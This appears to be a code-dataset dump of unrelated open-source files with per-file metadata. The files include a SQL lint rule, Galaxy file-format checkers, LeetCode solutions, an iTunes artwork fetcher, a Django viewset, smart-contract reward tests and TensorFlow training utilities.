from_expression_element = bracketed_expression # If we find a child with a "problem" type, raise an issue. # If not, we're fine. 
seg = from_expression_element.children( is_type( "with_compound_statement", "set_expression", "select_statement", ) ) if seg: return LintResult( anchor=seg[0], description=f"{parent_type} clauses should not contain subqueries. Use CTEs instead", ) return None
en
0.826337
Implementation of Rule L042. Join/From clauses should not contain subqueries. Use CTEs instead. By default this rule is configured to allow subqueries within ``FROM`` clauses but not within ``JOIN`` clauses. If you prefer a stricter lint then this is configurable. NB: Some dialects don't allow CTEs, and for those dialects this rule makes no sense and should be disabled. | **Anti-pattern** .. code-block:: sql select a.x, a.y, b.z from a join ( select x, z from b ) using(x) | **Best practice** .. code-block:: sql with c as ( select x, z from b ) select a.x, a.y, c.z from a join c using(x) Join/From clauses should not contain subqueries. Use CTEs instead. NB: No fix for this routine because it would be very complex to implement reliably. # type: ignore # Get the referenced table segment # Is it bracketed? If so, lint that instead. # If we find a child with a "problem" type, raise an issue. # If not, we're fine.
1.871187
2
lib/galaxy/util/checkers.py
BalthazarPavot/galaxy_project_reports
1
6628972
import re import bz2 import gzip import zipfile import binascii import imghdr from galaxy import util from six import StringIO HTML_CHECK_LINES = 100 try: import Image as PIL except ImportError: try: from PIL import Image as PIL except: PIL = None def check_image( file_path ): if PIL is not None: try: im = PIL.open( file_path ) except: return False if im: return im return False else: if imghdr.what( file_path ) is not None: return True return False def check_html( file_path, chunk=None ): if chunk is None: temp = open( file_path, "U" ) else: temp = chunk regexp1 = re.compile( "<A\s+[^>]*HREF[^>]+>", re.I ) regexp2 = re.compile( "<IFRAME[^>]*>", re.I ) regexp3 = re.compile( "<FRAMESET[^>]*>", re.I ) regexp4 = re.compile( "<META[\W][^>]*>", re.I ) regexp5 = re.compile( "<SCRIPT[^>]*>", re.I ) lineno = 0 # TODO: Potentially reading huge lines into string here, this should be # reworked. for line in temp: lineno += 1 matches = regexp1.search( line ) or regexp2.search( line ) or regexp3.search( line ) or regexp4.search( line ) or regexp5.search( line ) if matches: if chunk is None: temp.close() return True if HTML_CHECK_LINES and (lineno > HTML_CHECK_LINES): break if chunk is None: temp.close() return False def check_binary( name, file_path=True ): # Handles files if file_path is True or text if file_path is False is_binary = False if file_path: temp = open( name, "U" ) else: temp = StringIO( name ) try: for char in temp.read( 100 ): if util.is_binary( char ): is_binary = True break finally: temp.close( ) return is_binary def check_gzip( file_path ): # This method returns a tuple of booleans representing ( is_gzipped, is_valid ) # Make sure we have a gzipped file try: temp = open( file_path, "U" ) magic_check = temp.read( 2 ) temp.close() if magic_check != util.gzip_magic: return ( False, False ) except: return ( False, False ) # We support some binary data types, so check if the compressed binary file is valid # If the file is Bam, it should already have been detected 
as such, so we'll just check # for sff format. try: header = gzip.open( file_path ).read(4) if binascii.b2a_hex( header ) == binascii.hexlify( '.sff' ): return ( True, True ) except: return( False, False ) CHUNK_SIZE = 2 ** 15 # 32Kb gzipped_file = gzip.GzipFile( file_path, mode='rb' ) chunk = gzipped_file.read( CHUNK_SIZE ) gzipped_file.close() # See if we have a compressed HTML file if check_html( file_path, chunk=chunk ): return ( True, False ) return ( True, True ) def check_bz2( file_path ): try: temp = open( file_path, "U" ) magic_check = temp.read( 3 ) temp.close() if magic_check != util.bz2_magic: return ( False, False ) except: return( False, False ) CHUNK_SIZE = 2 ** 15 # reKb bzipped_file = bz2.BZ2File( file_path, mode='rb' ) chunk = bzipped_file.read( CHUNK_SIZE ) bzipped_file.close() # See if we have a compressed HTML file if check_html( file_path, chunk=chunk ): return ( True, False ) return ( True, True ) def check_zip( file_path ): if zipfile.is_zipfile( file_path ): return True return False def is_bz2( file_path ): is_bz2, is_valid = check_bz2( file_path ) return is_bz2 def is_gzip( file_path ): is_gzipped, is_valid = check_gzip( file_path ) return is_gzipped
import re import bz2 import gzip import zipfile import binascii import imghdr from galaxy import util from six import StringIO HTML_CHECK_LINES = 100 try: import Image as PIL except ImportError: try: from PIL import Image as PIL except: PIL = None def check_image( file_path ): if PIL is not None: try: im = PIL.open( file_path ) except: return False if im: return im return False else: if imghdr.what( file_path ) is not None: return True return False def check_html( file_path, chunk=None ): if chunk is None: temp = open( file_path, "U" ) else: temp = chunk regexp1 = re.compile( "<A\s+[^>]*HREF[^>]+>", re.I ) regexp2 = re.compile( "<IFRAME[^>]*>", re.I ) regexp3 = re.compile( "<FRAMESET[^>]*>", re.I ) regexp4 = re.compile( "<META[\W][^>]*>", re.I ) regexp5 = re.compile( "<SCRIPT[^>]*>", re.I ) lineno = 0 # TODO: Potentially reading huge lines into string here, this should be # reworked. for line in temp: lineno += 1 matches = regexp1.search( line ) or regexp2.search( line ) or regexp3.search( line ) or regexp4.search( line ) or regexp5.search( line ) if matches: if chunk is None: temp.close() return True if HTML_CHECK_LINES and (lineno > HTML_CHECK_LINES): break if chunk is None: temp.close() return False def check_binary( name, file_path=True ): # Handles files if file_path is True or text if file_path is False is_binary = False if file_path: temp = open( name, "U" ) else: temp = StringIO( name ) try: for char in temp.read( 100 ): if util.is_binary( char ): is_binary = True break finally: temp.close( ) return is_binary def check_gzip( file_path ): # This method returns a tuple of booleans representing ( is_gzipped, is_valid ) # Make sure we have a gzipped file try: temp = open( file_path, "U" ) magic_check = temp.read( 2 ) temp.close() if magic_check != util.gzip_magic: return ( False, False ) except: return ( False, False ) # We support some binary data types, so check if the compressed binary file is valid # If the file is Bam, it should already have been detected 
as such, so we'll just check # for sff format. try: header = gzip.open( file_path ).read(4) if binascii.b2a_hex( header ) == binascii.hexlify( '.sff' ): return ( True, True ) except: return( False, False ) CHUNK_SIZE = 2 ** 15 # 32Kb gzipped_file = gzip.GzipFile( file_path, mode='rb' ) chunk = gzipped_file.read( CHUNK_SIZE ) gzipped_file.close() # See if we have a compressed HTML file if check_html( file_path, chunk=chunk ): return ( True, False ) return ( True, True ) def check_bz2( file_path ): try: temp = open( file_path, "U" ) magic_check = temp.read( 3 ) temp.close() if magic_check != util.bz2_magic: return ( False, False ) except: return( False, False ) CHUNK_SIZE = 2 ** 15 # reKb bzipped_file = bz2.BZ2File( file_path, mode='rb' ) chunk = bzipped_file.read( CHUNK_SIZE ) bzipped_file.close() # See if we have a compressed HTML file if check_html( file_path, chunk=chunk ): return ( True, False ) return ( True, True ) def check_zip( file_path ): if zipfile.is_zipfile( file_path ): return True return False def is_bz2( file_path ): is_bz2, is_valid = check_bz2( file_path ) return is_bz2 def is_gzip( file_path ): is_gzipped, is_valid = check_gzip( file_path ) return is_gzipped
en
0.866888
# TODO: Potentially reading huge lines into string here, this should be # reworked. # Handles files if file_path is True or text if file_path is False # This method returns a tuple of booleans representing ( is_gzipped, is_valid ) # Make sure we have a gzipped file # We support some binary data types, so check if the compressed binary file is valid # If the file is Bam, it should already have been detected as such, so we'll just check # for sff format. # 32Kb # See if we have a compressed HTML file # reKb # See if we have a compressed HTML file
2.6736
3
python/105.construct-binary-tree-from-preorder-and-inorder-traversal.py
fengbaoheng/leetcode
1
6628973
# # @lc app=leetcode.cn id=105 lang=python3 # # [105] 从前序与中序遍历序列构造二叉树 # from typing import List class TreeNode: def __init__(self, x): self.val = x self.left = None self.right = None class Solution: # 根据前序遍历找到根 # 根据根在中序遍历中划分左右子树 # 递归生成子树 def buildTree(self, preorder: List[int], inorder: List[int]) -> TreeNode: try: len_pre = len(preorder) len_in = len(inorder) if len_pre != len_in or len_pre == 0: return None # 找到根节点 root_val = preorder[0] root = TreeNode(root_val) # 划分左右子树的遍历结果 index = inorder.index(root_val) if index == -1: return None pre_left = preorder[1:1+index] pre_right = preorder[1+index:] in_left = inorder[:index] in_right = inorder[1+index:] # 生成左右子树 root.left = self.buildTree(pre_left, in_left) root.right = self.buildTree(pre_right, in_right) return root except: return None
# # @lc app=leetcode.cn id=105 lang=python3 # # [105] 从前序与中序遍历序列构造二叉树 # from typing import List class TreeNode: def __init__(self, x): self.val = x self.left = None self.right = None class Solution: # 根据前序遍历找到根 # 根据根在中序遍历中划分左右子树 # 递归生成子树 def buildTree(self, preorder: List[int], inorder: List[int]) -> TreeNode: try: len_pre = len(preorder) len_in = len(inorder) if len_pre != len_in or len_pre == 0: return None # 找到根节点 root_val = preorder[0] root = TreeNode(root_val) # 划分左右子树的遍历结果 index = inorder.index(root_val) if index == -1: return None pre_left = preorder[1:1+index] pre_right = preorder[1+index:] in_left = inorder[:index] in_right = inorder[1+index:] # 生成左右子树 root.left = self.buildTree(pre_left, in_left) root.right = self.buildTree(pre_right, in_right) return root except: return None
zh
0.773571
# # @lc app=leetcode.cn id=105 lang=python3 # # [105] 从前序与中序遍历序列构造二叉树 # # 根据前序遍历找到根 # 根据根在中序遍历中划分左右子树 # 递归生成子树 # 找到根节点 # 划分左右子树的遍历结果 # 生成左右子树
3.652464
4
downloadArtwork.py
panchr/itunes-artwork-downloader
1
6628974
# <NAME> # downloadArtwork.py # STDIN/STDOUT wrapper around iTunes.py import urllib2 import urllib import json import sys import os API_URL = "http://itunes.apple.com/search" def main(): '''Main process: read data from stdin and write to stdout''' temp_dir = sys.stdin.readline().strip("\n") if not os.path.exists(temp_dir): os.mkdir(temp_dir) # AppleScript reads from here output = open(os.path.join(temp_dir, ".download_stdout"), "w") for line in sys.stdin: split_data = line.strip("\n").split("\t\t\t") artwork_url = getArtworkUrl(*split_data) if artwork_url: # filter out unicode characters from the filepath disk_path = unicode(os.path.join(temp_dir, ",".join(split_data)), errors = 'ignore').encode("ascii", errors = "ignore") urllib.urlretrieve(artwork_url, disk_path) else: disk_path = "-" output.write(disk_path + "\n") output.close() def getArtworkUrl(song, artist = "", album = ""): '''Get the artwork URL for a given song, with optional artist and album names''' # form a search query by concatenating the various metadata if album: resp = attemptSearchQuery(album, "album") # try to get a more generic result by omitting the album name if not resp: return getArtworkUrl(song, artist) else: resp = attemptSearchQuery(song, "song") if not resp: return getArtworkUrl(song + "," + artist, artist) results = filter(lambda item: artist in item["artistName"], resp) best = results[0] if len(results) >= 1 else resp[0] return best['artworkUrl60'].replace("60x60", "600x600") def attemptSearchQuery(query, entity): '''Attempt a search query''' params = {"term": query, "entity": entity, "country": "US", "media": "music", "limit": 50} resp = urllib2.urlopen(API_URL, urllib.urlencode(params)) if resp.getcode() == 200: data = json.loads(resp.read()) if data["resultCount"] >= 1: return data['results'] return "" # no result or failed call if __name__ == '__main__': main()
# <NAME> # downloadArtwork.py # STDIN/STDOUT wrapper around iTunes.py import urllib2 import urllib import json import sys import os API_URL = "http://itunes.apple.com/search" def main(): '''Main process: read data from stdin and write to stdout''' temp_dir = sys.stdin.readline().strip("\n") if not os.path.exists(temp_dir): os.mkdir(temp_dir) # AppleScript reads from here output = open(os.path.join(temp_dir, ".download_stdout"), "w") for line in sys.stdin: split_data = line.strip("\n").split("\t\t\t") artwork_url = getArtworkUrl(*split_data) if artwork_url: # filter out unicode characters from the filepath disk_path = unicode(os.path.join(temp_dir, ",".join(split_data)), errors = 'ignore').encode("ascii", errors = "ignore") urllib.urlretrieve(artwork_url, disk_path) else: disk_path = "-" output.write(disk_path + "\n") output.close() def getArtworkUrl(song, artist = "", album = ""): '''Get the artwork URL for a given song, with optional artist and album names''' # form a search query by concatenating the various metadata if album: resp = attemptSearchQuery(album, "album") # try to get a more generic result by omitting the album name if not resp: return getArtworkUrl(song, artist) else: resp = attemptSearchQuery(song, "song") if not resp: return getArtworkUrl(song + "," + artist, artist) results = filter(lambda item: artist in item["artistName"], resp) best = results[0] if len(results) >= 1 else resp[0] return best['artworkUrl60'].replace("60x60", "600x600") def attemptSearchQuery(query, entity): '''Attempt a search query''' params = {"term": query, "entity": entity, "country": "US", "media": "music", "limit": 50} resp = urllib2.urlopen(API_URL, urllib.urlencode(params)) if resp.getcode() == 200: data = json.loads(resp.read()) if data["resultCount"] >= 1: return data['results'] return "" # no result or failed call if __name__ == '__main__': main()
en
0.841902
# <NAME> # downloadArtwork.py # STDIN/STDOUT wrapper around iTunes.py Main process: read data from stdin and write to stdout # AppleScript reads from here # filter out unicode characters from the filepath Get the artwork URL for a given song, with optional artist and album names # form a search query by concatenating the various metadata # try to get a more generic result by omitting the album name Attempt a search query # no result or failed call
3.2373
3
app/group/views/group_form.py
TIHLDE/Lepton
7
6628975
from django.shortcuts import get_object_or_404 from rest_framework import mixins from rest_framework.viewsets import GenericViewSet from app.common.permissions import BasicViewPermission, is_admin_user from app.forms.mixins import APIFormErrorsMixin from app.forms.models.forms import GroupForm from app.forms.serializers.forms import GroupFormSerializer from app.group.models.group import Group class GroupFormViewSet(APIFormErrorsMixin, mixins.ListModelMixin, GenericViewSet): serializer_class = GroupFormSerializer permission_classes = [BasicViewPermission] queryset = GroupForm.objects.all() def get_queryset(self): group = get_object_or_404(Group, slug=self.kwargs.get("slug")) if self.request.user.is_leader_of(group) or is_admin_user(self.request): return self.queryset.filter(group=group) if self.request.user.is_member_of(group): return self.queryset.filter(group=group, is_open_for_submissions=True) return self.queryset.filter( group=group, is_open_for_submissions=True, only_for_group_members=False )
from django.shortcuts import get_object_or_404 from rest_framework import mixins from rest_framework.viewsets import GenericViewSet from app.common.permissions import BasicViewPermission, is_admin_user from app.forms.mixins import APIFormErrorsMixin from app.forms.models.forms import GroupForm from app.forms.serializers.forms import GroupFormSerializer from app.group.models.group import Group class GroupFormViewSet(APIFormErrorsMixin, mixins.ListModelMixin, GenericViewSet): serializer_class = GroupFormSerializer permission_classes = [BasicViewPermission] queryset = GroupForm.objects.all() def get_queryset(self): group = get_object_or_404(Group, slug=self.kwargs.get("slug")) if self.request.user.is_leader_of(group) or is_admin_user(self.request): return self.queryset.filter(group=group) if self.request.user.is_member_of(group): return self.queryset.filter(group=group, is_open_for_submissions=True) return self.queryset.filter( group=group, is_open_for_submissions=True, only_for_group_members=False )
none
1
1.935567
2
projects/balancer/tests/test_end_of_funding_date.py
Lido-Finance/rewards-managers
2
6628976
<reponame>Lido-Finance/rewards-managers import pytest from brownie import reverts, chain from math import floor rewards_limit = 25 * 1000 * 10**18 rewards_period = 3600 * 24 * 7 @pytest.mark.parametrize( 'period', [ rewards_period, floor(0.5*rewards_period), 4*rewards_period , 4*rewards_period + 1, 4*rewards_period - 1, 5*rewards_period ] ) def test_out_of_funding_date(rewards_manager, period, ldo_token, dao_treasury, program_start_date): amount = 100000 * 10**18 ldo_token.transfer(rewards_manager, amount, {"from": dao_treasury}) assert ldo_token.balanceOf(rewards_manager) == amount out_of_funding_date = program_start_date + rewards_period * 4 chain.sleep(period) chain.mine() assert rewards_manager.out_of_funding_date() == out_of_funding_date assert rewards_manager.period_finish() == out_of_funding_date def test_out_of_funding_date_with_limit_change( rewards_manager, ldo_token, dao_treasury, ldo_agent, program_start_date ): amount = 100000 * 10**18 ldo_token.transfer(rewards_manager, amount, {"from": dao_treasury}) assert ldo_token.balanceOf(rewards_manager) == amount out_of_funding_date = program_start_date + rewards_period * 4 chain.sleep(rewards_period) chain.mine() assert rewards_manager.out_of_funding_date() == out_of_funding_date assert rewards_manager.period_finish() == out_of_funding_date assert rewards_manager.available_allocations() == rewards_limit out_of_funding_date = program_start_date + 2 * rewards_period rewards_manager.set_rewards_limit_per_period(2 * rewards_limit, {"from": ldo_agent}) assert rewards_manager.rewards_limit_per_period() == 2 * rewards_limit assert rewards_manager.out_of_funding_date() == out_of_funding_date assert rewards_manager.period_finish() == out_of_funding_date
import pytest from brownie import reverts, chain from math import floor rewards_limit = 25 * 1000 * 10**18 rewards_period = 3600 * 24 * 7 @pytest.mark.parametrize( 'period', [ rewards_period, floor(0.5*rewards_period), 4*rewards_period , 4*rewards_period + 1, 4*rewards_period - 1, 5*rewards_period ] ) def test_out_of_funding_date(rewards_manager, period, ldo_token, dao_treasury, program_start_date): amount = 100000 * 10**18 ldo_token.transfer(rewards_manager, amount, {"from": dao_treasury}) assert ldo_token.balanceOf(rewards_manager) == amount out_of_funding_date = program_start_date + rewards_period * 4 chain.sleep(period) chain.mine() assert rewards_manager.out_of_funding_date() == out_of_funding_date assert rewards_manager.period_finish() == out_of_funding_date def test_out_of_funding_date_with_limit_change( rewards_manager, ldo_token, dao_treasury, ldo_agent, program_start_date ): amount = 100000 * 10**18 ldo_token.transfer(rewards_manager, amount, {"from": dao_treasury}) assert ldo_token.balanceOf(rewards_manager) == amount out_of_funding_date = program_start_date + rewards_period * 4 chain.sleep(rewards_period) chain.mine() assert rewards_manager.out_of_funding_date() == out_of_funding_date assert rewards_manager.period_finish() == out_of_funding_date assert rewards_manager.available_allocations() == rewards_limit out_of_funding_date = program_start_date + 2 * rewards_period rewards_manager.set_rewards_limit_per_period(2 * rewards_limit, {"from": ldo_agent}) assert rewards_manager.rewards_limit_per_period() == 2 * rewards_limit assert rewards_manager.out_of_funding_date() == out_of_funding_date assert rewards_manager.period_finish() == out_of_funding_date
none
1
1.894646
2
problems/1021-remove-outermost-parentheses.py
tzxyz/leetcode
0
6628977
<filename>problems/1021-remove-outermost-parentheses.py class Solution: """ 有效括号字符串为空 ("")、"(" + A + ")" 或 A + B,其中 A 和 B 都是有效的括号字符串,+ 代表字符串的连接。 例如,"","()","(())()" 和 "(()(()))" 都是有效的括号字符串。 如果有效字符串 S 非空,且不存在将其拆分为 S = A+B 的方法,我们称其为原语(primitive),其中 A 和 B 都是非空有效括号字符串。 给出一个非空有效字符串 S,考虑将其进行原语化分解,使得:S = P_1 + P_2 + ... + P_k,其中 P_i 是有效括号字符串原语。 对 S 进行原语化分解,删除分解中每个原语字符串的最外层括号,返回 S 。 示例 1: 输入:"(()())(())" 输出:"()()()" 解释: 输入字符串为 "(()())(())",原语化分解得到 "(()())" + "(())", 删除每个部分中的最外层括号后得到 "()()" + "()" = "()()()"。 示例 2: 输入:"(()())(())(()(()))" 输出:"()()()()(())" 解释: 输入字符串为 "(()())(())(()(()))",原语化分解得到 "(()())" + "(())" + "(()(()))", 删除每隔部分中的最外层括号后得到 "()()" + "()" + "()(())" = "()()()()(())"。 示例 3: 输入:"()()" 输出:"" 解释: 输入字符串为 "()()",原语化分解得到 "()" + "()", 删除每个部分中的最外层括号后得到 "" + "" = ""。 """ def removeOuterParentheses(self, s: str) -> str: """ 将字符串每个字符入栈,遇到括号就移除。 每次栈空,则将索引在 s[start+1:end] 加入结果集(移除最外层括号) :param s: :return: """ stack, result, start, end = [], [], 0, 0 for idx, c in enumerate(s): if stack: if stack[-1] == '(' and c == ')': stack.pop(-1) else: stack.append(c) if not stack: end = idx result.append(s[start+1:end]) start = idx + 1 else: stack.append(c) return ''.join(result) if __name__ == '__main__': tests = [ ('(()())(())', '()()()'), ('(()())(())(()(()))', '()()()()(())') ] for i, o in tests: assert Solution().removeOuterParentheses(i) == o
<filename>problems/1021-remove-outermost-parentheses.py class Solution: """ 有效括号字符串为空 ("")、"(" + A + ")" 或 A + B,其中 A 和 B 都是有效的括号字符串,+ 代表字符串的连接。 例如,"","()","(())()" 和 "(()(()))" 都是有效的括号字符串。 如果有效字符串 S 非空,且不存在将其拆分为 S = A+B 的方法,我们称其为原语(primitive),其中 A 和 B 都是非空有效括号字符串。 给出一个非空有效字符串 S,考虑将其进行原语化分解,使得:S = P_1 + P_2 + ... + P_k,其中 P_i 是有效括号字符串原语。 对 S 进行原语化分解,删除分解中每个原语字符串的最外层括号,返回 S 。 示例 1: 输入:"(()())(())" 输出:"()()()" 解释: 输入字符串为 "(()())(())",原语化分解得到 "(()())" + "(())", 删除每个部分中的最外层括号后得到 "()()" + "()" = "()()()"。 示例 2: 输入:"(()())(())(()(()))" 输出:"()()()()(())" 解释: 输入字符串为 "(()())(())(()(()))",原语化分解得到 "(()())" + "(())" + "(()(()))", 删除每隔部分中的最外层括号后得到 "()()" + "()" + "()(())" = "()()()()(())"。 示例 3: 输入:"()()" 输出:"" 解释: 输入字符串为 "()()",原语化分解得到 "()" + "()", 删除每个部分中的最外层括号后得到 "" + "" = ""。 """ def removeOuterParentheses(self, s: str) -> str: """ 将字符串每个字符入栈,遇到括号就移除。 每次栈空,则将索引在 s[start+1:end] 加入结果集(移除最外层括号) :param s: :return: """ stack, result, start, end = [], [], 0, 0 for idx, c in enumerate(s): if stack: if stack[-1] == '(' and c == ')': stack.pop(-1) else: stack.append(c) if not stack: end = idx result.append(s[start+1:end]) start = idx + 1 else: stack.append(c) return ''.join(result) if __name__ == '__main__': tests = [ ('(()())(())', '()()()'), ('(()())(())(()(()))', '()()()()(())') ] for i, o in tests: assert Solution().removeOuterParentheses(i) == o
zh
0.896935
有效括号字符串为空 ("")、"(" + A + ")" 或 A + B,其中 A 和 B 都是有效的括号字符串,+ 代表字符串的连接。 例如,"","()","(())()" 和 "(()(()))" 都是有效的括号字符串。 如果有效字符串 S 非空,且不存在将其拆分为 S = A+B 的方法,我们称其为原语(primitive),其中 A 和 B 都是非空有效括号字符串。 给出一个非空有效字符串 S,考虑将其进行原语化分解,使得:S = P_1 + P_2 + ... + P_k,其中 P_i 是有效括号字符串原语。 对 S 进行原语化分解,删除分解中每个原语字符串的最外层括号,返回 S 。 示例 1: 输入:"(()())(())" 输出:"()()()" 解释: 输入字符串为 "(()())(())",原语化分解得到 "(()())" + "(())", 删除每个部分中的最外层括号后得到 "()()" + "()" = "()()()"。 示例 2: 输入:"(()())(())(()(()))" 输出:"()()()()(())" 解释: 输入字符串为 "(()())(())(()(()))",原语化分解得到 "(()())" + "(())" + "(()(()))", 删除每隔部分中的最外层括号后得到 "()()" + "()" + "()(())" = "()()()()(())"。 示例 3: 输入:"()()" 输出:"" 解释: 输入字符串为 "()()",原语化分解得到 "()" + "()", 删除每个部分中的最外层括号后得到 "" + "" = ""。 将字符串每个字符入栈,遇到括号就移除。 每次栈空,则将索引在 s[start+1:end] 加入结果集(移除最外层括号) :param s: :return:
3.413991
3
utils.py
shun1024/noisystudent
0
6628978
<gh_stars>0 # coding=utf-8 # Copyright 2019 The Google NoisyStudent Team Authors. # # Licensed under the Apache License, Version 2.0 (the 'License'); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an 'AS IS' BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. '''Model utilities.''' from __future__ import absolute_import from __future__ import division from __future__ import print_function import six import json import re from absl import flags from PIL import Image import collections import os import functools import numpy as np import tensorflow as tf import tensorflow.compat.v2 as tf2 from tensorflow.python.tpu import tpu_function FLAGS = flags.FLAGS def build_learning_rate( initial_lr, global_step, steps_per_epoch=None, lr_decay_type='exponential', decay_factor=0.97, decay_epochs=2.4, total_steps=None, warmup_epochs=5, start_from_step=0, ): '''Build learning rate.''' lr_step = global_step + start_from_step if lr_decay_type == 'exponential': assert steps_per_epoch is not None decay_steps = steps_per_epoch * decay_epochs lr = tf.train.exponential_decay( initial_lr, lr_step, decay_steps, decay_factor, staircase=True) elif lr_decay_type == 'cosine': assert total_steps is not None lr = 0.5 * initial_lr * ( 1 + tf.cos(np.pi * tf.cast(lr_step, tf.float32) / total_steps)) elif lr_decay_type == 'constant': lr = initial_lr else: assert False, 'Unknown lr_decay_type : %s' % lr_decay_type if warmup_epochs: tf.logging.info('Learning rate warmup_epochs: %d' % warmup_epochs) warmup_steps = int(warmup_epochs * steps_per_epoch) warmup_lr = ( initial_lr * tf.cast(lr_step, tf.float32) / tf.cast( warmup_steps, tf.float32)) 
lr = tf.cond(lr_step < warmup_steps, lambda: warmup_lr, lambda: lr) return lr def build_optimizer(learning_rate, optimizer_name='rmsprop', decay=0.9, epsilon=0.001, momentum=0.9): '''Build optimizer.''' if optimizer_name == 'sgd': tf.logging.info('Using SGD optimizer') optimizer = tf.train.GradientDescentOptimizer(learning_rate=learning_rate) elif optimizer_name == 'momentum': tf.logging.info('Using Momentum optimizer') optimizer = tf.train.MomentumOptimizer( learning_rate=learning_rate, momentum=momentum) elif optimizer_name == 'rmsprop': tf.logging.info('Using RMSProp optimizer') optimizer = tf.train.RMSPropOptimizer(learning_rate, decay, momentum, epsilon) else: tf.logging.fatal('Unknown optimizer:', optimizer_name) return optimizer class TpuBatchNormalization(tf.layers.BatchNormalization): # class TpuBatchNormalization(tf.layers.BatchNormalization): '''Cross replica batch normalization.''' def __init__(self, fused=False, **kwargs): if fused in (True, None): raise ValueError('TpuBatchNormalization does not support fused=True.') super(TpuBatchNormalization, self).__init__(fused=fused, **kwargs) def _cross_replica_average(self, t, num_shards_per_group): '''Calculates the average value of input tensor across TPU replicas.''' num_shards = tpu_function.get_tpu_context().number_of_shards group_assignment = None if num_shards_per_group > 1: if num_shards % num_shards_per_group != 0: raise ValueError('num_shards: %d mod shards_per_group: %d, should be 0' % (num_shards, num_shards_per_group)) num_groups = num_shards // num_shards_per_group group_assignment = [[ x for x in range(num_shards) if x // num_shards_per_group == y ] for y in range(num_groups)] return tf.tpu.cross_replica_sum(t, group_assignment) / tf.cast( num_shards_per_group, t.dtype) else: tf.logging.info('TpuBatchNormalization None') return tf.tpu.cross_replica_sum(t, group_assignment) / tf.cast( num_shards, t.dtype) def _moments(self, inputs, reduction_axes, keep_dims): '''Compute the mean and variance: it 
overrides the original _moments.'''
    # Per-shard (per-core) statistics from the stock BatchNormalization.
    shard_mean, shard_variance = super(TpuBatchNormalization, self)._moments(
        inputs, reduction_axes, keep_dims=keep_dims)

    num_shards = tpu_function.get_tpu_context().number_of_shards or 1
    # Flag value -1 means "auto-select the cross-replica group size".
    if FLAGS.num_shards_per_group != -1:
      num_shards_per_group = FLAGS.num_shards_per_group
    else:
      if num_shards <= 8:  # Skip cross_replica for 2x2 or smaller slices.
        num_shards_per_group = 1
      else:
        num_shards_per_group = max(8, num_shards // 8)
    tf.logging.info('TpuBatchNormalization with num_shards_per_group %s',
                    num_shards_per_group)
    if num_shards_per_group > 1 or num_shards_per_group == -2:
      # Compute variance using: Var[X]= E[X^2] - E[X]^2.
      shard_square_of_mean = tf.math.square(shard_mean)
      shard_mean_of_square = shard_variance + shard_square_of_mean
      group_mean = self._cross_replica_average(
          shard_mean, num_shards_per_group)
      group_mean_of_square = self._cross_replica_average(
          shard_mean_of_square, num_shards_per_group)
      group_variance = group_mean_of_square - tf.math.square(group_mean)
      return (group_mean, group_variance)
    else:
      return (shard_mean, shard_variance)


def stochastic_depth(inputs, is_training, stochastic_depth_rate):
  '''Apply stochastic depth.

  At training time the whole input is randomly zeroed per example with
  probability `stochastic_depth_rate` and kept activations are rescaled by
  1/keep_prob; at eval time this is the identity.
  '''
  if not is_training:
    return inputs

  # Compute keep_prob
  # TODO(tanmingxing): add support for training progress.
  keep_prob = 1.0 - stochastic_depth_rate

  # Compute stochastic_depth tensor
  batch_size = tf.shape(inputs)[0]
  random_tensor = keep_prob
  random_tensor += tf.random_uniform([batch_size, 1, 1, 1], dtype=inputs.dtype)
  # floor() of a value in [keep_prob, 1 + keep_prob) yields a per-example
  # Bernoulli(keep_prob) 0/1 mask.
  binary_tensor = tf.floor(random_tensor)
  output = tf.div(inputs, keep_prob) * binary_tensor
  return output


def archive_ckpt(ckpt_eval, ckpt_objective, ckpt_path):
  '''Archive a checkpoint if the metric is better.

  Returns True when the checkpoint was archived, False when the previously
  saved objective is better or no checkpoint files were found.
  '''
  ckpt_dir, ckpt_name = os.path.split(ckpt_path)
  saved_objective_path = os.path.join(ckpt_dir, 'best_objective.txt')
  saved_objective = float('-inf')
  if tf.gfile.Exists(saved_objective_path):
    with tf.gfile.GFile(saved_objective_path, 'r') as f:
      saved_objective = float(f.read())
  if saved_objective > ckpt_objective:
    tf.logging.info('Ckpt %s is worse than %s', ckpt_objective, saved_objective)
    return False

  filenames = tf.gfile.Glob(ckpt_path + '.*')
  if filenames is None:
    tf.logging.info('No files to copy for checkpoint %s', ckpt_path)
    return False

  # Clear the old folder.
  dst_dir = os.path.join(ckpt_dir, 'archive')
  if tf.gfile.Exists(dst_dir):
    tf.gfile.DeleteRecursively(dst_dir)
  tf.gfile.MakeDirs(dst_dir)

  # Write checkpoints.
  for f in filenames:
    dest = os.path.join(dst_dir, os.path.basename(f))
    tf.gfile.Copy(f, dest, overwrite=True)
  ckpt_state = tf.train.generate_checkpoint_state_proto(
      dst_dir,
      model_checkpoint_path=ckpt_name,
      all_model_checkpoint_paths=[ckpt_name])
  with tf.gfile.GFile(os.path.join(dst_dir, 'checkpoint'), 'w') as f:
    f.write(str(ckpt_state))
  with tf.gfile.GFile(os.path.join(dst_dir, 'best_eval.txt'), 'w') as f:
    f.write('%s' % ckpt_eval)

  # Update the best objective.
  with tf.gfile.GFile(saved_objective_path, 'w') as f:
    f.write('%f' % ckpt_objective)

  tf.logging.info('Copying checkpoint %s to %s', ckpt_path, dst_dir)
  return True


# TODO(hongkuny): Consolidate this as a common library cross models.
class DepthwiseConv2D(tf.keras.layers.DepthwiseConv2D, tf.layers.Layer):
  '''Wrap keras DepthwiseConv2D to tf.layers.'''

  pass


def save_pic(uint8_arr, filename, log=True):
  # Saves a uint8 image array as a max-quality JPEG through tf.gfile
  # (so GCS paths work as well as local ones).
  if log:
    tf.logging.info('saving {}'.format(filename))
  img = Image.fromarray(uint8_arr)
  with tf.gfile.Open(filename, 'wb') as ouf:
    img.save(ouf, subsampling=0, quality=100)


def int64_feature(value):
  '''Wrapper for inserting int64 features into Example proto.'''
  if not isinstance(value, list):
    value = [value]
  return tf.train.Feature(int64_list=tf.train.Int64List(value=value))


def float_feature(value):
  '''Wrapper for inserting float features into Example proto.'''
  if not isinstance(value, list):
    value = [value]
  return tf.train.Feature(float_list=tf.train.FloatList(value=value))


def bytes_feature(value):
  '''Wrapper for inserting bytes features into Example proto.'''
  if six.PY3 and isinstance(value, six.text_type):
    value = six.binary_type(value, encoding='utf-8')
  return tf.train.Feature(bytes_list=tf.train.BytesList(value=[value]))


